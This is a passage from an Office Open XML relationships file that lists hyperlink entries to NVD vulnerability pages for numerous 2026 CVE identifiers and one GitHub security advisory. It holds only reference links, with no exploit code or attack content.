TargetMode="External" Id="rId1024" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83988" TargetMode="External" Id="rId1025" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83990" TargetMode="External" Id="rId1026" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83995" TargetMode="External" Id="rId1027" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84000" TargetMode="External" Id="rId1028" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85983" TargetMode="External" Id="rId1029" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9034" TargetMode="External" Id="rId1030" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18167" TargetMode="External" Id="rId1031" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19304" TargetMode="External" Id="rId1032" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19306" TargetMode="External" Id="rId1033" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19397" TargetMode="External" Id="rId1034" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53553" TargetMode="External" Id="rId1035" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63464" TargetMode="External" Id="rId1036" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66767" TargetMode="External" Id="rId1037" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69683" TargetMode="External" Id="rId1038" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73267" TargetMode="External" Id="rId1039" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73315" TargetMode="External" Id="rId1040" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75033" TargetMode="External" Id="rId1041" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75569" TargetMode="External" Id="rId1042" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76640" TargetMode="External" Id="rId1043" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77909" TargetMode="External" Id="rId1044" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78623" TargetMode="External" Id="rId1045" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79750" TargetMode="External" Id="rId1046" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81832" TargetMode="External" Id="rId1047" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82537" TargetMode="External" Id="rId1048" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84361" TargetMode="External" Id="rId1049" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86207" TargetMode="External" Id="rId1050" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9040" TargetMode="External" Id="rId1051" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-298h-jpq4-m665" TargetMode="External" Id="rId1052" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-46418" TargetMode="External" Id="rId1053" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77110" TargetMode="External" Id="rId1054" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79749" TargetMode="External" Id="rId1055" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82020" TargetMode="External" Id="rId1056" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82053" TargetMode="External" Id="rId1057" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85533" TargetMode="External" Id="rId1058" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86073" TargetMode="External" Id="rId1059" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2021-44320" TargetMode="External" Id="rId1060" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0860" TargetMode="External" Id="rId1061" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12483" TargetMode="External" Id="rId1062" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13297" TargetMode="External" Id="rId1063" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16025" TargetMode="External" Id="rId1064" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16037" TargetMode="External" Id="rId1065" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16497" TargetMode="External" Id="rId1066" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18056" TargetMode="External" Id="rId1067" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18672" TargetMode="External" Id="rId1068" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18916" TargetMode="External" Id="rId1069" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19080" TargetMode="External" Id="rId1070" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19118" TargetMode="External" Id="rId1071" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19205" TargetMode="External" Id="rId1072" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19300" TargetMode="External" Id="rId1073" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19305" TargetMode="External" Id="rId1074" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19401" TargetMode="External" Id="rId1075" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19538" TargetMode="External" Id="rId1076" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19858" TargetMode="External" Id="rId1077" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-26456" TargetMode="External" Id="rId1078" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28604" TargetMode="External" Id="rId1079" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-3174" TargetMode="External" Id="rId1080" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38344" TargetMode="External" Id="rId1081" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38347" TargetMode="External" Id="rId1082" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47625" TargetMode="External" Id="rId1083" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48888" TargetMode="External" Id="rId1084" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52770" TargetMode="External" Id="rId1085" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54598" TargetMode="External" Id="rId1086" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54599" TargetMode="External" Id="rId1087" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55215" TargetMode="External" Id="rId1088" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55552" TargetMode="External" Id="rId1089" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55784" TargetMode="External" Id="rId1090" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57098" TargetMode="External" Id="rId1091" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57099" TargetMode="External" Id="rId1092" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62759" TargetMode="External" Id="rId1093" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62813" TargetMode="External" Id="rId1094" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66304" TargetMode="External" Id="rId1095" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66307" TargetMode="External" Id="rId1096" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67376" TargetMode="External" Id="rId1097" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68887" TargetMode="External" Id="rId1098" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69329" TargetMode="External" Id="rId1099" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69342" TargetMode="External" Id="rId1100" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69378" TargetMode="External" Id="rId1101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69397" TargetMode="External" Id="rId1102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69428" TargetMode="External" Id="rId1103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69429" TargetMode="External" Id="rId1104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69443" TargetMode="External" Id="rId1105" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69514" TargetMode="External" Id="rId1106" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69539" TargetMode="External" Id="rId1107" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69587" TargetMode="External" Id="rId1108" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69588" TargetMode="External" Id="rId1109" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69599" TargetMode="External" Id="rId1110" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69607" TargetMode="External" Id="rId1111" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69631" TargetMode="External" Id="rId1112" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69710" TargetMode="External" Id="rId1113" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69739" TargetMode="External" Id="rId1114" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69744" TargetMode="External" Id="rId1115" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69760" TargetMode="External" Id="rId1116" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69793" TargetMode="External" Id="rId1117" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69803" TargetMode="External" Id="rId1118" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69804" TargetMode="External" Id="rId1119" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69805" TargetMode="External" Id="rId1120" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69809" TargetMode="External" Id="rId1121" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69852" TargetMode="External" Id="rId1122" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69881" TargetMode="External" Id="rId1123" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69890" TargetMode="External" Id="rId1124" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69929" TargetMode="External" Id="rId1125" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69930" TargetMode="External" Id="rId1126" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70065" TargetMode="External" Id="rId1127" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70124" TargetMode="External" Id="rId1128" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70570" TargetMode="External" Id="rId1129" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70579" TargetMode="External" Id="rId1130" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70587" TargetMode="External" Id="rId1131" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71330" TargetMode="External" Id="rId1132" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72923" TargetMode="External" Id="rId1133" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72928" TargetMode="External" Id="rId1134" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72932" TargetMode="External" Id="rId1135" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72943" TargetMode="External" Id="rId1136" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72949" TargetMode="External" Id="rId1137" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72954" TargetMode="External" Id="rId1138" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72989" TargetMode="External" Id="rId1139" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73017" TargetMode="External" Id="rId1140" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75465" TargetMode="External" Id="rId1141" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75998" TargetMode="External" Id="rId1142" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76956" TargetMode="External" Id="rId1143" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77101" TargetMode="External" Id="rId1144" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77102" TargetMode="External" Id="rId1145" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77103" TargetMode="External" Id="rId1146" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77104" TargetMode="External" Id="rId1147" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77108" TargetMode="External" Id="rId1148" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77124" TargetMode="External" Id="rId1149" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77494" TargetMode="External" Id="rId1150" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77498" TargetMode="External" Id="rId1151" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77499" TargetMode="External" Id="rId1152" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77501" TargetMode="External" Id="rId1153" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77502" TargetMode="External" Id="rId1154" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77886" TargetMode="External" Id="rId1155" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77888" TargetMode="External" Id="rId1156" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77889" TargetMode="External" Id="rId1157" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77890" TargetMode="External" Id="rId1158" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77893" TargetMode="External" Id="rId1159" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77895" TargetMode="External" Id="rId1160" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77898" TargetMode="External" Id="rId1161" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78523" TargetMode="External" Id="rId1162" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78574" TargetMode="External" Id="rId1163" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78837" TargetMode="External" Id="rId1164" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79377" TargetMode="External" Id="rId1165" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79378" TargetMode="External" Id="rId1166" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79407" TargetMode="External" Id="rId1167" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79572" TargetMode="External" Id="rId1168" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79575" TargetMode="External" Id="rId1169" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81270" TargetMode="External" Id="rId1170" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81355" TargetMode="External" Id="rId1171" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81381" TargetMode="External" Id="rId1172" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81790" TargetMode="External" Id="rId1173" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83989" TargetMode="External" Id="rId1174" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84001" TargetMode="External" Id="rId1175" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84219" TargetMode="External" Id="rId1176" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85045" TargetMode="External" Id="rId1177" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85155" TargetMode="External" Id="rId1178" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85400" TargetMode="External" Id="rId1179" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86075" TargetMode="External" Id="rId1180" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86250" TargetMode="External" Id="rId1181" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86711" TargetMode="External" Id="rId1182" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86721" TargetMode="External" Id="rId1183" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86728" TargetMode="External" Id="rId1184" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19651" TargetMode="External" Id="rId1185" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19683" TargetMode="External" Id="rId1186" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62906" TargetMode="External" Id="rId1187" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69347" TargetMode="External" Id="rId1188" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 